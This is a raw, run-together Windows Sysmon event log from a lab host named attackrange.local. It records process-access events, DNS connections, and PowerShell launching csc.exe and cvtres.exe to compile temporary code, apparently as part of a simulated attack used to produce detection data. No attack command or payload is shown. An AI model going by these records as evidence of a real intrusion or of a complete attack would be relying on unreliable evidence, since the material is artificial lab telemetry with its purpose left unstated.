11:59:57.903{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000318Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.903{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000317Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.903{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000316Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.903{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000315Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.903{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000314Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.903{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000313Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.903{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000312Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.903{266CAFBE-62C8-6064-0500-00000000AD01}6201152C:\Windows\system32\csrss.exe{266CAFBE-643D-6064-CC02-00000000AD01}4852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000311Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.903{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000310Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.903{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000309Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.903{266CAFBE-643D-6064-CB02-00000000AD01}38284436C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe{266CAFBE-643D-6064-CC02-00000000AD01}4852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+b46d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3db4|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+3f2c|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+4002|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+27b2|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+2804|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorpehost.dll+2948|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+7fe06|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+4726f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45e1f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45b16|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+45826|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1938a|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+18bf6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+a831|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe+1f0a49|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x8000000000000000308Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.908{266CAFBE-643D-6064-CC02-00000000AD01}4852C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe14.10.25028.0 built by: VCTOOLSD15RTMMicrosoft® Resource File To COFF Object Conversion UtilityMicrosoft® .NET FrameworkMicrosoft CorporationCVTRES.EXEC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\ADMINI~1\AppData\Local\Temp\RESC5A9.tmp" "c:\Users\Administrator\AppData\Local\Temp\CSC2D44CB7CC3432D8BD42593E465E72.TMP"C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-6439-6064-4FB3-100000000000}0x10b34f0HighMD5=C877CBB966EA5939AA2A17B6A5160950,SHA256=1FE531EAC592B480AA4BD16052B909C3431434F17E7AE163D248355558CE43A6,IMPHASH=55D76ADE7FFEA0F41FF2B55505C2B362{266CAFBE-643D-6064-CB02-00000000AD01}3828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\ADMINI~1\AppData\Local\Temp\ay2yhusm.cmdline" 354300x8000000000000000307Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:55.547{266CAFBE-62ED-6064-2900-00000000AD01}2752C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudptruefalse10.0.1.14win-dc-892.attackrange.local53186-false10.0.0.2ip-10-0-0-2.eu-central-1.compute.internal53domain 354300x8000000000000000306Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:55.547{266CAFBE-62ED-6064-2900-00000000AD01}2752C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local62007- 354300x8000000000000000305Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:55.547{266CAFBE-62DD-6064-1400-00000000AD01}1340C:\Windows\System32\svchost.exeNT AUTHORITY\NETWORK SERVICEudptruetrue0:0:0:0:0:0:0:1win-dc-892.attackrange.local62007-true0:0:0:0:0:0:0:1win-dc-892.attackrange.local53domain 10341000x8000000000000000304Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.747{266CAFBE-6439-6064-C602-00000000AD01}49122544C:\Windows\system32\conhost.exe{266CAFBE-643D-6064-CB02-00000000AD01}3828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000303Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.747{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000302Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.747{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000301Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.747{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000300Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.747{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000299Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.747{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000298Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.747{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000297Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.747{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000296Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.747{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000295Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.747{266CAFBE-62DD-6064-0C00-00000000AD01}8844C:\Windows\system32\svchost.exe{266CAFBE-6437-6064-C302-00000000AD01}4456C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x8000000000000000294Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.747{266CAFBE-62C8-6064-0500-00000000AD01}620744C:\Windows\system32\csrss.exe{266CAFBE-643D-6064-CB02-00000000AD01}3828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x8000000000000000293Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.747{266CAFBE-643C-6064-C902-00000000AD01}38844988C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe{266CAFBE-643D-6064-CB02-00000000AD01}3828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+384236|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2be405|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2be05f|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2bdb80|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2bdb08|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+2bc1c3|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+7d8ed2|C:\Windows\assembly\NativeImages_v4.0.30319_64\System\c99ae323aa8566cc2c0b79b709b48095\System.ni.dll+7d894a|UNKNOWN(00007FF893A5BB0F) 154100x8000000000000000292Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 11:59:57.711{266CAFBE-643D-6064-CB02-00000000AD01}3828C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe4.8.3761.0 built by: NET48REL1Visual C# Command Line 